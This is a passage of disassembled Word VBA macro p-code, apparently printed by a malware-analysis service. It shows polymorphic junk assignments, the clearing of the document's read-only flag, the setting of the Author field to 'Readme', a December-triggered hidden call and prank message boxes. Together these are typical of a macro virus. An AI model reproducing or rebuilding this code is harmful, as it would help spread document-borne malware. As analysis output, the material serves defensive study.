' 	Ld Rnd 
' 	LitDI2 0x1073 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St CgHz8684 
' Line #23:
' 	Ld HvVzMwFv 
' 	Ld MfSi12772 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1429 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St QwBk4696 
' Line #24:
' 	Ld AiGg6151 
' 	Ld MfSi12772 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1720 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St QwBk4696 
' Line #25:
' 	LitVarSpecial (False)
' 	Ld ActiveDocument 
' 	MemSt ReadOnlyRecommended 
' Line #26:
' 	Ld IgNj8349 
' 	Ld RfGh13422 
' 	Concat 
' 	St BfFqMuRo 
' Line #27:
' 	Ld IgNj8349 
' 	Ld GjBf10447 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0DE2 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St ShLs17516 
' Line #28:
' 	Ld MqOj10739 
' 	Ld PiRy8200 
' 	Concat 
' 	St OqFnThCr 
' Line #29:
' 	Ld MqOj10739 
' 	Ld AwEf5529 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0EB6 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St IhJv11053 
' Line #30:
' 	Ld IoJwEsKi 
' 	Ld IeGm10210 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x171C 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St HxHq9017 
' Line #31:
' 	Ld PrQi5723 
' 	Ld IeGm10210 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1449 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St HxHq9017 
' Line #32:
' 	Ld BhQyRpKv 
' 	Ld OkQo8309 
' 	Concat 
' 	Ld LlDjRmOm 
' 	Concat 
' 	Ld FgUm7944 
' 	Concat 
' 	St LqUr11219 
' Line #33:
' 	Ld FgUm7944 
' 	Ld OkQo8309 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x10A1 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St LqUr11219 
' Line #34:
' 	Ld AxOkTlAh 
' 	Ld DtBe9899 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x2388 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St InOt19088 
' Line #35:
' 	Ld NqAz15248 
' 	Ld DtBe9899 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x22BE 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St InOt19088 
' Line #36:
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	St DqFg 
' Line #37:
' 	Ld DqFg 
' 	LitDI2 0x0063 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0009 "Perfect !"
' 	Ld vbSystemModal 
' 	ArgsCall MsgBox 0x0002 
' 	EndIf 
' Line #38:
' 	Ld BsVz15822 
' 	Ld JsVu10684 
' 	Concat 
' 	St NuGuIkOs 
' Line #39:
' 	Ld BsVz15822 
' 	Ld MiEh7405 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1CC5 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St BpNo9123 
' Line #40:
' 	Ld OeMpMlGw 
' 	Ld CmEt10041 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0122 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St UtSz6230 
' Line #41:
' 	Ld RvIf14097 
' 	Ld CmEt10041 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x178E 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St UtSz6230 
' Line #42:
' 	Ld EgNj3704 
' 	Ld GzJf11337 
' 	Concat 
' 	St ArMzMqBz 
' Line #43:
' 	Ld EgNj3704 
' 	Ld EyLi8116 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0990 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St OkFu4624 
' Line #44:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x000C 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ArgsCall (Call) FqFl1072DzRp 0x0000 
' 	EndIf 
' Line #45:
' 	Ld UgMy8855 
' 	Ld AwJk11076 
' 	Concat 
' 	St MnCfFnGx 
' Line #46:
' 	Ld UgMy8855 
' 	Ld CnGn9780 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x139F 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St UmJr13920 
' Line #47:
' 	Ld BiPh2384 
' 	Ld IeSk2892 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x019A 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St TfCk8028 
' Line #48:
' 	Ld HnIm13951 
' 	Ld MgQz12329 
' 	Concat 
' 	St GtRvTtCg 
' Line #49:
' 	Ld HnIm13951 
' 	Ld CgQz13483 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x18A8 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St PuOp14278 
' Line #50:
' 	Ld HxGkJkDo 
' 	Ld UnNz9612 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x14E6 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St FgAf7053 
' Line #51:
' 	Ld SpPw7311 
' 	Ld UnNz9612 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0227 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St FgAf7053 
' Line #52:
' 	Ld ToGlRxKo 
' 	Ld HqDx3271 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x049A 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St NqNt9587 
' Line #53:
' 	Ld QgKl3940 
' 	Ld HqDx3271 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0255 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St NqNt9587 
' Line #54:
' 	Ld MpUsClFx 
' 	Ld UiIt10397 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0DF7 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St FgDg3981 
' Line #55:
' 	Ld HpEh13037 
' 	Ld UiIt10397 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0DF3 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St FgDg3981 
' Line #56:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0007 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0011 
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0011 "Manuela is 17 !!!"
' 	Ld vbInformation 
' 	LitStr 0x0014 "Birthday Greeting!!!"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #57:
' 	Ld FeRgLgHn 
' 	Ld NsUr7025 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0C8A 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St HfCf7564 
' Line #58:
' 	Ld IuEw14266 
' 	Ld NsUr7025 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1C09 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St HfCf7564 
' Line #59:
' 	Ld QtMj15010 
' 	Ld DnAw7002 
' 	Concat 
' 	St MjEhRqIn 
' Line #60:
' 	Ld QtMj15010 
' 	Ld GjNz3128 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x2242 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St IlHm6528 
' Line #61:
' 	StartWithExpr 
' 	Ld wdDialogFileSummaryInfo 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' Line #62:
' 	LitStr 0x0006 "Readme"
' 	MemStWith Author 
' Line #63:
' 	LitStr 0x0001 " "
' 	MemStWith Subject 
' Line #64:
' 	ArgsMemCallWith Execute 0x0000 
' Line #65:
' 	EndWith 
' Line #66:
' 	Ld SwDq13116 
' 	Ld RqCx14208 
' 	Concat 
' 	St KzOyCnDq 
' Line #67:
' 	Ld SwDq13116 
' 	Ld GgUr18781 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x188F 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St TiFu12301 
' Line #68:
' 	Ld OoCvQsOo 
' 	Ld DuSl9923 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1347 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St EqPy16979 
' Line #69:
' 	Ld UqJe7784 
' 	Ld DuSl9923 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1AC1 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St EqPy16979 
' Line #70:
' 	Ld TsSqHrBw 
' 	Ld AhGn14505 
' 	Concat 
' 	Ld KoLmKtTl 
' 	Concat 
' 	Ld LxQv12305 
' 	Concat 
' 	St EeAs9706 
' Line #71:
' 	Ld LxQv12305 
' 	Ld AhGn14505 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1E0D 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St EeAs9706 
' Line #72:
' 	Ld ArEp16803 
' 	Ld HeTv12433 
' 	Concat 
' 	St FoRmBeTe 
' Line #73:
' 	Ld ArEp16803 
…

Open this report in the interactive analyzer, or submit your own file for analysis.